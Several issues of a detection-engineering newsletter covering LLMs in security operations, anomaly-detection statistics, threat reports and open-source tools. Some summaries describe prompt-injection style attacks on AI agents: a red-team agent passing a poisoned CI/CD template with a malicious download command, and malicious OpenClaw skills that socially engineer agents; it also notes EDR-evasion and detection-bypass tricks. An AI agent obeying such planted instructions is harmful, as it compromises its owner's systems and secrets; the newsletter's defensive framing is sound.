The operations are impressive. Case Study 1 focuses on the organizational structure of their cells and how a manager tracks each employee's progress. Case Study 2 dives into a synthetic identity generation operation in which an operator used AI tools to forge driver’s licenses, passports, and other documents to bypass identity verification systems. Case Study 3 involved findings about a single operator working with 21 different personas to find freelance and gig work and generate revenue. The last Case Study was a self-dox of the operator, and the team tracked their location to Central Moscow using the EXIF metadata leak.

There’s a TON of IOCs at the end, so make sure to take those email addresses and check your applicant tracking systems for any hits.

🔗 Open Source

0xbbuddha/hermes

Mythic C2 compatible Linux agent. I think what’s cool about some of these modern post-exploitation frameworks is you can write your own implants and agents, and as long as they adhere to frameworks like Mythic, you can orchestrate them however you wish.

MatheuZSecurity/ksentinel

An experimental Linux defense tool that monitors syscall hooks and entries for potential tampering by rootkits. It’s a kernel module itself, so you risk interoperability between Linux versions, as well as having a catastrophic crash. It has several heuristics to find tampering, so it might be fun to run this while deploying your own rootkits to see if ksentinel catches activity.

Otsmane-Ahmed/KEIP

Speaking of more Kernel-level defense tools, KEIP sits between supply chain tools like pip and your Kernel. I like this one because it focuses solely on the network traffic generated by pip, and you can define network boundary policies so it can only talk to services, ports, and domains on your allow list.

antropos17/Aegis

Not gonna lie, when I first combed through this repo I wanted to include it solely for the radar-like visualization of AI observability and security posture. Aegis is an npm tool with nearly 100 heuristics for detecting rogue or malicious AI agents. It’ll watch everything from the exfiltration of secrets on your machine to processes being spawned by the AI that may be risky.

Detection Engineering Weekly
Knowing what good looks like in agentic security 19 February 2026 at 14:11

Knowing what good looks like in agentic security

Detection Engineering Weekly

By: Zack Allen

19 February 2026 at 14:11

I’ve had this nagging desire to write about my personal thoughts on agentic workflows and security operations for several months. I’ve expertly procrastinated on getting these thoughts on paper. Two reasons: I wanted to understand AI in security operations more deeply first, and, frankly, you’re probably exhausted by the marketing hype around agentic security takes.

The issue with point two is that this level of AI hype detracts from the pragmatism of using these technologies in our day-to-day work. This hype tires everyone out in security because, at the same time, leaders (including me) are literally asking all our organizations what they are doing with coding agents and other LLM technologies. The hype creates a state of “AI poverty” for those who yearn to try these technologies but cannot because of the individual cost and the barrier to entry for firms that can afford them.

Detection Engineering Weekly is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

So, when I think of current security experts who can’t use a technology that is cost-prohibitive, or aspiring security experts who already have a bunch of knowledge outside of AI they need to demonstrate, I start to feel conflicted. I am privileged to be in a position where I can use this technology and be at the cutting edge. I am also privileged because I Know What Good Looks Like with the expected outcomes of this technology. But how is someone going to break into this industry with a peak even higher than ever before?

I’ve seen this exact industry circumstance happen before, and I hope this piece serves as a reminder of the risks of agentic coding and LLMs to experts in our field, and how it will likely save it.

Knowing What Good Looks Like

2015 was a special time in my career, especially at Hacker Summer Camp:

I got to fly out on company dime to BlackHat and do booth duty, talk to security people, attend talks, and find parties that can give me free food and alcohol
I gave my first mainstage DEFCON talk
This was also the year that one of my favorite security vendors, OpenDNS, was swallowed by the monstrous Cisco machine, and one of my favorite tools, booths, and T-Shirts of all time withered away. Rest in peace

When walking the floor at BlackHat, I could see the last three years of cyber marketing peeing in the “ML Security” pool. This was the time of the hype around endpoint startups like Cylance & Endgame, who were pushing the idea that Machine Learning & Statistics can find attacks that rules cannot find, and it can save you hours of work using their tools for security operations.

The general reaction of most security professionals to this marketing-speak was to scoff. And I felt like we were all justified in doing so, because we are all professionally paranoid. We knew what separated a good alert from a bad alert, so even if we didn’t have that expertise, we still had that going for us.

But what those companies did was lay the groundwork for the availability of knowledge of machine learning and AI to the masses. Their moat was expertise, but that expertise rippled through the rest of the industry, and we all began using it in our daily lives.

Resistance is futile: You can’t stop the spread of security expertise

Anomaly detection, linear and logistic regression, binary classification, and clustering were all advanced concepts for a typical security engineer. Within a handful of years, the concepts became accessible through open-source libraries, which led to open-source SIEM and SOAR technologies, and the moat dissipated. We started to understand what good looked like with this tech. It had a lot of sharp edges, it sometimes created more work when it didn’t work, and it certainly sucked at most things besides very specific implementations.

Does this sound familiar?

Eleven years ago, I went through this cycle, and I think this is happening again. At the time, I justified using “ML Security” with this thought experiment.

You have 5 alerts that take 4 hours each = 20 hours of manual work
You run these alerts through an ML pipeline and
- 2 alerts succeed → you spend 5 minutes on each (8 hours saved)
- 3 alerts fail → still 4 hours each (12 hours remaining)

Result: 12 hrs of work with 2 good alerts and 3 bad alerts. 12 < 20, so isn’t this a net benefit?

And that 8-hour gain? It compounds across every security engineer. Our industry has more time to work on harder problems. We all became better.

There was one problem: you can’t easily verify correctness in “ML Security”. These techniques were essentially black boxes. Linear algebra drew lines on a multi-dimensional feature vector, Calculus provided weights to each feature, error correcting algorithms smoothed the weights out, and all you saw was these scores added up to some concept of a confidence percentage of 0-100%.

This is what I think is happening right now with LLMs in our field. The problems are different, the solution is WAY different, but the fundamentals for the most part remain. There are risks, and this is why I’m so obsessed with the space right now.

The Starry Night Problem with Agentic Security: Lossy Compression

LLMs and AI are a very lossy kind of compression. Some of these 2024 blogs, written during the explosive growth and use of ChatGPT, compare it to a pixelated, compressed JPEG image reduced to pixel art. Take a look at the photo (this one is pulled from Aboard’s newsletter):

It’s van Gogh’s The Starry Night reduced to a few dozen kilobytes. Humans can see this and know it’s The Starry Night, but also understand that it’s not the high-resolution, accurate version. LLMs take a massive corpus of training data, the equivalent of a super high-resolution image of The Starry Night, and compress it like the above picture. You query the LLM; it performs a bunch of math on the context of your conversation and your prompt, and it tries to reverse-engineer the high-resolution image to give you something that resembles the image above.

Now take this in the context of cybersecurity, and my thought experiment above. An expert will know what good looks like: you can ask an LLM to investigate an alert, and when it shows the response and the reasoning behind it, you can quickly verify if it’s B.S. or not. But if this hallucinates and gives a non-expert a crappy, low-res picture, or even more so, another LLM, will it know its low-res?

The Expertise Gap

This is what worries me about the expertise gap in security investigations and engineering. If we stick to this old model of “you must learn how we learned and painstakingly execute a runbook until you get a decision”, then yes, this will eventually create security experts. But we’ll also set up a new generation of experts for failure, since painstaking tasks are what LLMs are really good at solving.

But when do you become an expert? How many hours? And weren’t we all wildly inefficient in that learning process?

I banged my head against my keyboard for hours just to get efficient at vim. That was 50% building expertise and 50% struggling-by-doing. Separately, it certainly wasn’t efficient for me to review an alert generated by Logistic Regression with a feature vector weight file attached. I couldn’t ask the regression model questions. I couldn’t interrogate the model’s reasoning. I just had to accept the score or reject it.

But with LLMs, I can ask it a shit ton of questions, such as: “What does MITRE ATT&CK’s Detection Strategy say about this rule?”, or “Can you check that this field name actually exists?” The feedback loop is immediate, iterative, and bidirectional. It matters less that it hallucinated, because you can keep reverse-engineering the van Gogh picture with human prompts rather than reading a statistics book.

This trust and expertise calibration in the industry will take years, but I think it’ll be much less than with previous technologies.

Learning to see the Pixels to get more, not less, security experts

Create meme: The keanu reeves matrix, matrix neo I know kung fu, Now I know the kung fu matrix — Claude injects RFC 5246 into a Junior Security Engineer’s Brain. 2025, colorized.

Here’s where I land: this technology (unlike DeFi/Blockchain and the Metaverse, lol) is here to stay and will make a material impact on our lives in terms of security. I know this because it’s fundamentally changing how I work and how my organization does work. Knowledge gaps are closing fast, and when they close, productivity begins to skyrocket.

This is all excellent for those breaking into our field, because the things that differentiated us (time in seat) aren’t gatekeeping others as much as before.

You can eventually reverse engineer The Starry Night if you ask Claude/ChatGPT enough times. The image will suck the first few times, but after 10 or 20 times, your human brain can piece together the original image. Learning isn’t about cramming the TLS 1.2 RFC in your brain to remember the pseudo-random function for generating secrets that is seeded with the literal secret master secret. It’s asking Claude to tell you about the RFC and pull out random facts that you can spend 15 mins reading about and laughing like I just did.

The Mental Model for Learning Security Needs to Change

If we assume that LLM use is here to stay, and people need to use LLMs in their day-to-day security work, then the mental model for learning and operations needs to change. For the sake of this exercise, I propose three non-negotiables to follow:

Store and trust human artifacts outside the LLM boundary
- We will need full-resolution pictures of architecture diagrams, runbooks, code, policies, and incident timelines. These artifacts should augment your LLM use rather than be thrown at it
- Technologies like RAGs are helpful here, as well as asking the LLM to give you references for you to check its work if it references one of these human artifacts
Make the LLM defend itself
- If you don’t understand a decision the LLM makes, keep asking it questions. Explain its reasoning. Tell it to take its time. You’d rather spend a few minutes doing this than several hours
- There are all kinds of agentic architectures to do this. Anthropic’s Building Effective Agents has some fantastic examples of this
Learn the Fundamentals, then accelerate
- It’s probably good for you to learn to write Sigma rules or perform investigations manually before you can be the expert for an LLM. Remember, you want to know what good looks like
- Once you get the fundamentals down, you can learn from mistakes faster than ever, which makes you more of an expert. The 10,000 Hours Rule ceiling to become an expert drops

Why I’m Optimistic

Look, the peak is higher, but the climb is faster. I have very little time between my personal life, work, and this newsletter, and coding agents have brought back the joy of coding that I haven’t had for years, because it requires time and dedication. I have this joy because I remember how hard it was to balance pushing code to production services, building rules, and performing operational work.

I think this transforms how we work, not who we are. So let’s move forward with a healthy skepticism, because we all know what good looks like.

Detection Engineering Weekly is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

Received — 12 February 2026 ⏭ Detection Engineering Weekly

Detection Engineering Weekly
DEW #145 - Modified Z-Score for Anomaly Detection, Watermarking for Audit Logs -> SIEM and Zack gives you all an RFC for homework 11 February 2026 at 14:02

DEW #145 - Modified Z-Score for Anomaly Detection, Watermarking for Audit Logs -> SIEM and Zack gives you all an RFC for homework

Detection Engineering Weekly

By: Zack Allen

11 February 2026 at 14:02

Welcome to Issue #145 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

I’ve been tinkering a ton with Anthropic’s Opus 4.6, and the agentic swarm mode is gratifying and terrifying to watch in action. I recommend trying it out!
My life the last two weeks have been sickness and travel. I got COVID before my office visit trip in NY (I went in negative!), came home, got a sinus infection 2 days later and I’m sitting here writing this with a fever. Go figure.
For those who watched the Superbowl: When the Patriots lose, America wins.

Sponsor: runZero

Master KEV Prioritization with Evidence-Based Intelligence
The CISA KEV Catalog tells you what to patch, but not how urgently or why it matters to your environment. 68% of KEV entries need additional context to prioritize effectively, yet most teams patch in order without understanding true operational risk.
A new KEVology report by former CISA KEV Section Chief Tod Beardsley reveals what KEV entries actually mean for defenders. Plus, the free KEV Collider tool from runZero helps you prioritize based on evidence, not assumptions.
Get The Report

💎 Detection Engineering Gem 💎

The Detection Engineering Baseline: Hypothesis and Structure (Part 1) by Brandon Lyons

Baselining is an overused term in this field because, at least in my experience, it’s a hand-wavy marketing term. You’ll read about a product that’ll perform baselines of your behavior and environment, and it’ll alert you if it detects something abnormal or outside that baseline. In practice, this works, but the opaqueness of some of these methods makes it hard to understand how it happens.

This is why posts like Lyons help cut through the opaqueness and show the receipts of how to do this in practice. And to be honest, it’s nothing groundbreaking, only in the sense that the concepts Lyons proposes here are part of entry-level statistics literacy. Which is why I’m pretty opinionated on the engineer of detection engineer. Don’t get it twisted: although the concepts in this post are entry-level statistics, understanding the application requires deep security expertise.

Lyons lays out a 7-step, repeatable process to establish a detection baseline, quoted here:

Backtesting of rule logic: Validate your detection against historical data before deploying
Codified thought process: Document why you chose specific thresholds and methods
Historical context: Capture what your environment looked like when the baseline was created
Reproducible process: Enable re-running when tuning or validating detection logic
Foundation for the ADS: Feed directly into your Alerting Detection Strategy documentation
Cross-team collaboration fuel: Surface insecure patterns and workflows with data-backed evidence
Threat hunting runway: When alert precision isn’t achievable, convert the baseline into a scheduled hunt

This process succinctly captures a well-thought-out detection process. Without data, how can anyone possibly deploy detections that will fire? Without context around that data, how can anyone possibly believe the rules that are firing outside of the baseline?

They step through the 7 steps here using a CloudTrail API example. Basically, Lyons tries to map out what anomalous behavior looks like for CloudTrail access across an environment. The statistics section focuses on a modified Z-Score. Here’s the rundown:

Security metrics (API calls per day, login attempts per hour, file accesses) approximate a normal distribution (a bell curve), especially when aggregated over time. This means that:

Most values cluster around the median (middle value)
Extreme values become increasingly rare as you move away from the center
The distribution is symmetric

To establish a baseline, Lyons collects historical data, such as 30 days of activity, and computes two key statistics:

Median - the middle value
MAD (Median Absolute Deviation) - measures spread around the median

When a new value enters your queue, you compute the Modified Z-score, which is the distance-via-standard-deviation of that value from the median. Modified Z-score is really good at capturing outliers, versus the regular Z-score, which focuses on standard deviations from the mean, and can be sensitive to outliers.

An outlier can be, according to Lyons, creating administrative credentials at 3am to an abnormal amount of S3 bucket accesses, perhaps used for exfiltration. Here’s a graphic I prompted Claude to create to drive this point home:

If my stats professor put normal distribution computation problems in the context of finding russian threat actors, I probably would have aced the class

This type of rigor removes the guessing game about whether events are absolute measurements. Is 1000 API calls weird, or is 100? Is 10 pm an acceptable window for Administrator access, or is 5 pm? By looking at the standard deviations away from the median, you focus on relative measurement. It removes the human judgment about the absolute weirdness of an event, and whenever you remove a human from a large data problem, you get a bit closer to sanity.

Lyons created a follow-along Jupyter notebook with synthetic data to recreate the measurements in his blog. I’ll link that repository below in the Open Source section!

🔬 State of the Art

Building a Production-Ready Snowflake Audit Log Pipeline to S3 by xcal

Centralizing logs to your SIEM is a full-time endeavor, and requires expertise in so many areas, such as:

Data formats of the logs you are extracting, transforming, and loading into the SIEM
Telemetry source peculiarities, such as APIs, subsystems on hosts, or weird licensing issues
Choosing a technology stack that can normalize logs and send them into the SIEM
Navigating technological barriers due to inherent design choices, especially between data lakes or SaaS products

This is why I really enjoyed reading this post about moving audit log data from Snowflake into a SIEM. It focuses on the software engineering component of detection engineering, because many of the design choices made inside this post are things that you’ll hear about on a Software Engineering interview.

The first half of this blog details the design choices behind moving data from Snowflake to S3 and then to a SIEM, with clear architectural “gotchas” you need to design around. The most interesting one to me is the watermark strategy.

Snowflake audit logs have built-in latency. An event can occur at 12:00, but the audit log does not appear until 12:03. You use a watermark to pull the oldest events up to the last event you saw. For example, a watermark of 12:00 means you processed events up to 11:59. This watermark doesn’t work if you focus only on the timestamp generated, so you try to use it to focus on what you’ve observed.

In the purple example, 3 export runs for logs came in, and the watermark is updated based on the export time. When the “late arrival” log comes in, the watermark is later than the data's arrival time, so the log is lost forever. In the second yellow example, this is fixed by looking at the maximum observed time in the logs, not at the time the export is run.

What’s beautiful about this blog, too, is how it sets up a “configuration-as-data” design pattern. They use a statically stored procedure for the export logic and a table that maps the target View, such as SESSION or LOGIN, to the timestamp used to perform the watermark.

This design choice makes it easy to add more views, VIEW_NAME, specify a target timestamp, TS_COLUMN_NAME, then store the watermark in LAST_TS. A singular INSERT into the EXPORT_WATERMARK table adds additional Audit logs views to export, without changing the code.

Detection Rule Fragility: Design Pitfalls Every Detection Engineer Must Know by SOCLabs

Detection rule fragility occurs when your rules become too precise for a single detection scenario and miss variants that achieve the same outcome. In this post, SOCLabs details several “gotcha” scenarios on the command line where classic detection on strings can be circumvented by operating-system-level trickery.

My favorite examples they list involve URL detection with cURL. There’s something about the concept of URL parsing that is so fascinating on the operating system level, because it’s a little known attack path that can have some hilarious results. For example, if you want some light reading, check out RFC3986 - Uniform Resource Identifier (URI): Generic Syntax.

Let’s say you write a rule to detect a local IP address, such as http://192.168.x.x Your operating system and browser parses it, and can navigate to it, so you write a rule to detect local subnet usage in cURL. But you can also write http://192.168. as hex, http://0xC0.0xA, or even octal, http://0300.0250. So, did you write a rule for those? :)

How I Use LLMs for Security Work by Josh Rickard

This is a cool, battle-tested approach by Rickard for prompting an LLM to do security work. I think people can become overwhelmed by what to prompt an LLM, because they are generally really good at taking vanilla prompt sessions and running with whatever work you assign them. But, as your work gets more complex, there are some nifty strategies you can use, and Rickard lays out, to make the best use of what they have to offer.

Giving context is probably the biggest takeaway here, so Rickard describes the concept of role-stacking, explains your technology stack, clarifies the current understanding of the ask, and gives it time to execute the ask.

What AI Really Looks Like Inside the SOC: Notes from a Fireside Chat by Daniel Santiago

In this post, Santiago shares his notes around a SOC fireside chat they attended during a Simply Cyber event. The cool part of his synopsis was seeing the “ground reality” of AI working and not working in a SOC environment. Most of the insights aren’t surprising to me, but it’s good to hear it validate some of our feelings. For example, Santiago points out how these agents raise the baseline for analysts, rather than replace them.

☣️ Threat Landscape

Beyond the Battlefield: Threats to the Defense Industrial Base by Google Threat Intelligence Group (GTIG)

The GTIG group published a large survey of threats they are tracking against Defense firms and organizations, such as contractors, critical infrastructure and government entities. They have four large takeaways and specify which threat actor groups are part of these takeaways:

Targeting of critical infrastructure by Russian-nexus threat actor groups to introduce physical and security effects
Hiring of fake IT Workers and DPRK’s focus on espionage using IT workers and malware campaigns
China-nexus threat actors representing the largest campaigns targeting these sectors by volume
An uptick of data leak sites and extortion groups against manufacturing firms that may supply the defense industrial base

VoidLink: Dissecting an AI-Generated C2 Implant by Rhys Downing

VoidLink is a post-exploitation and implant framework that focuses on cloud-native infrastructure. It was in the headlines around a month ago, and the main headline was that it was likely LLM-generated. Downing pulled apart the payloads and tried to confirm this finding, so it’s nice to see proof rather than believing the hype. The fun part is that within the binary, several clues suggested it was LLM-generated, primarily in the code comments.

According to Downing, and I tend to agree here, adding comments to your malware seems like a rookie move because you want operational security and anti-research capabilities, so this likely suggests it’s LLM-generated and the operators were careless.

New Clickfix variant ‘CrashFix’ deploying Python Remote Access Trojan by Microsoft Defender Security Research Team

Microsoft Security Research uncovered a new style of ClickFix social engineering techniques, dubbed CrashFix. When a victim is funneled to the malicious site, they are tricked to thinking their computer is crashing, and are directed to run the malicious payload.

this screams the age-old Runescape scam of “LET ME HOLD YOUR GOLD FOR YOU REAL QUICK”

The rest of the campaign is well-researched, but nothing particularly different from other ClickFix and infostealer campaigns. I imagine we’ll continue to see these social engineering threats evolve until we blow up command-line access for people and move to something else. Perhaps Claude Cowork social engineering?

Malicious use of virtual machine infrastructure by Sophos Counter Threat Unit Research Team

This piece by the Sophos Threat Research Team began with a security incident in which they uncovered attacker infrastructure with unique Windows hostnames. When the team dug into these hostnames, they found they were out-of-the-box names from a legitimate IT provider, ISPSystem. At first, it seemed like a single actor was leveraging ISPSystem to quickly deploy infrastructure, but when the team pivoted to Shodan, they found several thousand instances of ISPSystem infrastructure in use across many different malware campaigns.

Windows hostnames are a cool pivot that I haven’t really seen much of in my years of threat research. This worked in Sophos’ favor because it’s virtual machine software that offers some ease of use for several threat actor groups.

ClawdBot Skills Just Ganked Your Crypto by Open Source Malware

This ClawdBot malware post is a little different from the VirusTotal one I posted last week, mostly because it shows some of the conversations to the creator of ClawdBot on X on removing them. Hint: it doesn’t look good, and you should avoid using these skills registries until they get much better security and governance practices in place.

Peter Steinberger admits he can't secure ClawHub — we need to deploy an army of OpenClaw agents to battle OpenClaw agents that are malicious or zombies

🔗 Open Source

Btlyons1/Detection-Engineering-Baseline

Link to Brandon Lyon’s modified Z-score lab listed above in the Gem. Contains a Jupyter notebook to help readers follow along, as well as loads of synthetic data to try out the detections.

moltenbit/NotepadPlusPlus-Attack-Triage

PowerShell cmdlet to test if you ran a compromised version of NotepadPlusPlus from their incident announcement last week. It checks known IOCs, so it’s not a guarantee that they are still relevant or that a clean run means you weren’t compromised.

S1lkys/PhantomFS

This is a clever technique that abuses Windows ProjFS. ProjFS allows processes to project filesystems based on several attributes, so it’s used for things like OneDrive where you connect out to a drive hosted on a cloud provider. S1lkys built this in a way that it’ll project an encrypted payload, like Mimikatz, if it detects a source process coming from the command line versus EDR tools.

wardgate/wardgate

Wardgate is an Agentic proxy that stores secrets and API keys on your agent’s behalf. The idea here is that the Agent is aware it has API access to some external service, you have it use Wardgate, and Wardgate will serve as the API proxy. This is especially helpful if you are afraid of attacks on Agents that steal local or cached credentials.

praetorian-inc/augustus

August is an LLM penetration testing harness that integrates with dozens of LLMs. It has hundreds of attacks in 47 attack categories that you can let loose on models you are using from foundational labs, or some that you are training on top of the foundational models.

Received — 5 February 2026 ⏭ Detection Engineering Weekly

Detection Engineering Weekly
DEW #144 - Pyramid of Permanence and 🦞OpenClaw 🦞 Security Dumpster Fires 4 February 2026 at 14:03

DEW #144 - Pyramid of Permanence and 🦞OpenClaw 🦞 Security Dumpster Fires

Detection Engineering Weekly

By: Zack Allen

4 February 2026 at 14:03

Welcome to Issue #144 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

I’m in beautiful New York City this week, and finally made the move to get a hotel away from Times Square. Best decision ever, even if you are in Manhattan, anywhere is quieter than Times Square
I got OpenClaw up and running, and made a Moltbook account with it. This issue is also heavy on OpenClaw security because it’s a dumpster fire
I flew to my hometown and it was colder than New England and New York. The jet bridge at our arrival gate was frozen to the ground, and they spent 30 mins trying to get it moving. We eventually moved to a different jet bridge

Sponsor: Adaptive Security

Stop Deepfake Phishing Before It Tricks Your Team
Today’s phishing attacks involve AI voices, videos, and deepfakes of executives.
Adaptive is the security awareness platform built to stop AI-powered social engineering.
Protect your team with:
AI-driven risk scoring that reveals what attackers can learn from public data
Deepfake attack simulations featuring your executives
Take a Free Self-Guided Tour

💎 Detection Engineering Gem 💎

TTPI’s: Extending the Classic Model by Andrew VanVleet

Tactics, Techniques & Procedures (TTPs) is a table-stakes term in our industry. It binds our understanding of attacker behavior into a common lexicon. Within this lexicon, MITRE ATT&CK reigns supreme, and they have some generally agreed-upon definitions within their ATT&CK FAQ. Basically, in order to understand MITRE ATT&CK, you have to understand their nomenclature of TTPs, where:

Tactics describe an adversarial objective, such as initial access
Techniques describe how an attacker can execute some operation to achieve that objective
Procedures describe the implementation details of a technique in a given environment

In this post, VanVleet challenges this model because the specific details of how an attack is carried out at the Procedure level can sometimes be vague. I think this is by design on MITRE’s part, because the procedure to achieve it can differ depending on the environmental context I mentioned earlier. He makes the analogy that Procedures are like a cake, not necessarily a recipe. He proposes the concept of Instance, which is the recipe itself, to achieve that procedure.

ATT&CK does get close to this via Detection Strategies. As an example, VanVleet looks at T1070.001, Indicator Removal: Clear Windows Event Logs. The MITRE page includes a description of how this can be achieved, but it seems high-level enough that some more detail on the recipe would be helpful. The detection strategy can provide more clues from an event-ID perspective, but without the technical implementation, it may be hard to recreate and test. Here’s his idea of what an Instance section could look like:

This could be helpful for detection engineers who want to recreate the attack in their own environment to test their telemetry generation and detection rules.

I’ve always had a hard time with the Pyramid of Pain for this exact reason. The “TTPs” part at the top of the Pyramid can encapsulate so much work, without any ability to reverse-engineer how the attack is captured. In fact, I’ve always thought TTPs/Tools should be combined, because almost every Procedure contains some level of tooling to capture the attack.

In the spirit of alliteration, and perhaps more as a thought exercise, he proposes the “Pyramid of Permanence”.

Basically, Procedures are what we want to capture, and everything below the tip of the Pyramid are Instances that supports the procedure. It’s an interesting thought experiment, and as long as it serves as a lexicon to drive the conversation on better modeling, I’m all for it.

🔬 State of the Art

The story of the 5-minute-long endpoint by Leónidas Neftalí González Campos

This is more software engineering-related, but I sometimes come across blogs where I can see how security analysts and software engineers alike can commiserate working in a bureaucracy. Campos is a software engineer working on a customer appointment management product, and a JIRA ticket came in reporting that a simple task of uploading customers started crashing on “large” uploads. They took the ticket, found a terrible pattern within their software base that tried to upload one user at a time, and deployed a fix in record time.

This is a story of how many bad small decisions and only shipping new features can lead to a monstrosity of an issue. My takeaway here for all my security readers is to challenge governance around your security operations, because optimizing decisions around a cool technology or an isolated problem can lead to a lot of heartache and burnout.

OpenClaw Observatory Report #1: Adversarial Agent Interaction & Defense Protocols by Udit Raj Akhouri

OpenClaw is the new hotness right now, and as expected, security researchers are running to poke holes in it, both from an architectural security perspective and, in this case, security agent efficacy. I thought this was a unique pentesting report, where Akhouri set up a red team/blue team exercise to test the blue team’s ability to prevent abuse of the Blue team’s Lethal Trifecta trust relationships. In the first scenario, the red team agent sends a “help” threat detection template to set up a CI/CD project for detection testing. Within that CI/CD pipeline, a malicious cURL command and a bash script would download a payload and infect the blue team. In the second scenario, they tried something similar with a JSON template injection payload.

Openclaw caught the first attack and, according to Akhouri, is awaiting an analysis from the blue team agent on the second attack. I’m not too surprised that the blue team agent caught these types of attacks, but it goes to show how important it is to have emerging technologies and agent orchestration platforms undergo security testing to see how well they handle these scenarios.

Work travel means more podcasts, and it was great to dive back in with Jack Naglieri’s detection engineering-focused podcast, Detection at Scale. In this episode, Jack interviews Ryan Glynn from Compass and picks his brain on the use of LLMs in his day-to-day work as a staff security engineer.

I appreciated the grounding of the LLM hype Glynn makes and what works and doesn’t work. At the beginning of the episode, he makes a great point about using LLMs to make binary decisions as an investigation technique. Basically, it’s much easier to look at a yes versus a no for an alert investigation and challenge its assumptions than to try to solve a lot of components at once.

He also shared his experience evaluating AI SOC vendors and how hard it was to understand their efficacy. For example, when an AI SOC agent can say whether an alert is being or malicious, it’ll at times make up steps along the way that never happened.

Glynns phishing detection setup was super interesting. He compared and contrasted the agony of training ML models for phishing before the advent of LLMs, where you’d need to set up various binary classification and entity extraction capabilities to achieve that binary feature. Now, you can still arrive at that binary feature and use more traditional models, but you use the LLM to generate the flag. It uses the LLM as a feature-extraction tool rather than a hegemonic security tool.

👊 Quick Hits

Precision & Recall in Detection Engineering by rootxover

It’s cool to see how others interpret the concepts of precision & recall within their own detection writing. In this post, RootXover covers the concepts in the context of detection engineering and provides an example of how to compute them in a phishing alert scenario. I liked their graph of the four “zones” of labels for detections:

Alert Storm: low precision, high recall
Detection Purgatory: low precision, low recall
Quiet but Risky: high precision, low recall
Dream Zone: high precision, high recall

I will say, it’s rare that I’ve ever seen the “Dream Zone” in my career. There’s a natural relationship between precision and recall where, in general, as one increases, the other decreases.

Task Management for Agentic Coding by Jimmy Vo

Friend of the newsletter, Jimmy Vo, dives into Anthropic’s task management framework, to-dos, but now called “tasks”. This isn’t a cybersecurity post, but I think the content is important if you are starting to leverage Claude Code to manage task and todo lists. The obvious example of using tasks is alert triage, but I think it’s important for any security person to have a system for managing how they do work. Jimmy uses gardening tasks as an example, but it was cool to see how Claude can create the tasks, dependency graphs, and build a plan to achieve whatever task he issues.

☣️ Threat Landscape

I’m back on my Three Buddy Problem listening sprees, but this one was SO good to listen to just for the commentary on the wiper attack against Poland. The gang dives deep into a Polish CERT Report where a Russian APT targeted 30 wind and solar farms, as well as a power plant, and issued a wiper attack to essentially shut them down. Of note, it’s the dead of winter in December in Poland, and this heat and power outage threatened nearly half a million people.

The key argument here is how the reliance on Fortinet leads to these attacks. These appliances are notoriously bad at preventing exploitation due to poor coding practices. But if you want additional security support, you have to pay for services, since they don’t allow any forensic access to the devices.

Notepad++ Hijacked by State-Sponsored Hackers by Notepad++

Notepad++’s update servers were compromised from June 2025 to September 2025, according to Notepad++. Chinese-nexus actors allegedly compromised Notepad++’s hosting provider, leading them to redirect update traffic for downstream compromise. The specific language that the blog author used was that the “Shared Hosting Server” was compromised. It’s hard to say what the difference is between “shared” and their “hosting server”.

Did the APT find a way onto the shared server, escalate privileges, and laterally move to Notepad++? Or is this just semantics about using a VPS, and was Notepad++ specifically targeted? I’d be much more interested in the technical details of the former.

No Place Like Home Network: Disrupting the World's Largest Residential Proxy Network by Google Threat Intelligence Group (GTIG)

GTIG disrupted and tookdown a massive residential proxy network, IPIDEA. Residential proxy networks are akin to what Google calls Operational Relay Boxes (ORBs), but with a specific commercial application: you can “rent” exit points from unaware victims.

These networks operationalize their proxies by providing SDKs to mobile app providers that enroll devices into their networks. The mobile apps essentially get a cut of their profits, and IPIDEA sells access to these mobile phones for threat actors to abuse. This is especially helpful if you want to perform credential-stuffing attacks, ticket-scalping campaigns, or something more malicious, such as hiding C2 servers.

The report contains all kinds of technical details in how IPIDEA orchestrated their network of residential proxies. It operates like a command and control network, which is what makes it hard for me to understand any type of legitimate use of these services.

OpenClaw in the Wild: Mapping the Public Exposure of a Viral AI Assistant by Silas Cutler

Threat Researcher G.O.A.T. (and my undergrad classmate!) Silas Cutler released a post in which he scanned and found OpenClaw instances exposed on the Internet. If you haven’t heard of OpenClaw, it’s an autonomous AI agent that took the Internet by storm due to its ability to connect to apps you own, such as your Brave Browser or 1Password, to do work on your behalf. It became especially popular with the advent of Moltbook, where these agents were given the ability to post on a Reddit-like site without any interaction from the owner.

When you start OpenClaw, you can use the CLI or a web server. So when searching for its default port on Censys, Silas found over 21,000 instances of OpenClaw exposed on the Internet. Most of these should be secured through a secret password or token, but it’s still worrying in the sense that due to its popularity, people will try to find ways to exploit these instances. And if they get on these instances, they’ll use the interface to abuse the integrations and extract everything, including passwords and email contents.

From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized by Bernardo Quintero

OpenClaw becomes more terrifying when you realize how extendable it is. In the agentic world, popularized by Claude Code, skills provide prompts and instructions to an agent, making it more specialized for running tasks. For example, if you want your agent to join Moltbook, you download a skill that teaches OpenClaw how to use the site, including using its API to perform heartbeat checks.

Several Skills registries emerged after OpenClaw’s popularity exploded, and VirusTotal researcher Quintero found malware on many of the Skills hosted on these sites. The numbers are pretty crazy:

At the time of writing, VirusTotal Code Insight has already analyzed more than 3,016 OpenClaw skills, and hundreds of them show malicious characteristics.

Quintero splits “malicious characteristics” into poor security practices and vulnerabilities and straight up malware. The malware is in plain English, and reminds me of ClickFix in the sense that it’s socially engineering your OpenClaw / Claude Code.

🔗 Open Source

trailofbits/claude-code-devcontainer

Sandbox environment for running Claude Code. You install a CLI and it boots up a container for you to run Claude in an isolated environment. It includes tooling to install remote container extensions in VSCode or Cursor, so it offers some options if you prefer an IDE over the CLI.

trailofbits/dropkit

Dropkit lets you quickly bootstrap a secure DigitalOcean droplet. You provide dropkit a Digital Ocean API key, and it’ll create a workspace with your SSH key and an out-of-the-box Tailscale installation. It has some cool cost-saving features that allow you to hibernate droplets so you aren’t spending money when you aren’t using them.

backbay-labs/clawdstrike

Runtime security monitoring for autonomous agents, including Open Clawd, Claude Code, LangChain and more. It exposes a set of tools that enforce policy boundaries, such as preventing network calls, local filesystem reads and writes, or shell commands.

You can configure it to allow or block certain actions based on the policy you set. It comes with some out-of-the-box policies and appears to follow a pattern similar to EDRs, intercepting risky functions and performing a security check before allowing them to execute.

a2awais/Threat-Hunting

Collection of dozens of threat hunting queries for KQL & Crowdstrike.

toborrm9/malicious_extension_sentry

